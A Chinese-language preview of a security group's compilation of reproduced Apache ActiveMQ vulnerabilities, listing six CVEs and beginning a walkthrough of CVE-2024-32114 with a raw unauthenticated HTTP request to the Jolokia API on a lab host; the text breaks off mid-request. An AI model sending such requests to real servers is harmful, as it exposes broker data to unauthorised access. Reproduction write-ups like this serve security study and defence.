Apache ActiveMQ历史漏洞复现合集

文章预览

关注我们❤️，添加星标🌟，一起学安全！ 作者：Timeline Sec漏洞研究组 本文字数：8902 阅读时长：5-6mins 声明：仅供学习参考使用，请勿用作违法用途，否则后果自负 序号 漏洞编号 漏洞类型 作者 1 CVE-2024-32114 未授权 hexixi 2 CVE-2023-46604 RCE hexixi 3 CVE-2022-41678 RCE hexixi 4 CVE-2017-15709 信息泄漏 hexixi 5 CVE-2016-3088 任意文件写入 hexixi 6 CVE-2015-5254 反序列化 hexixi 注：后台回复“ 技术手册 ”可获取合集PDF文档 Apache ActiveMQ Jolokia REST API 未授权访问漏洞（CVE-2024-32114） 0x01 利用条件 权限要求：无需权限 其他条件：允许远程访问 0x02 影响版本 6.0.0 < = Apache ActiveMQ < 6.1.2 0x03 漏洞复现 访问/api/jolokia可看到相关信息 获取AactiveMQ代理消息 GET /api/jolokia/ read /org.apache.activemq: type =Broker,brokerName=localhost HTTP/1.1 Host: 192.168.187.129:8161 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecu ………………………………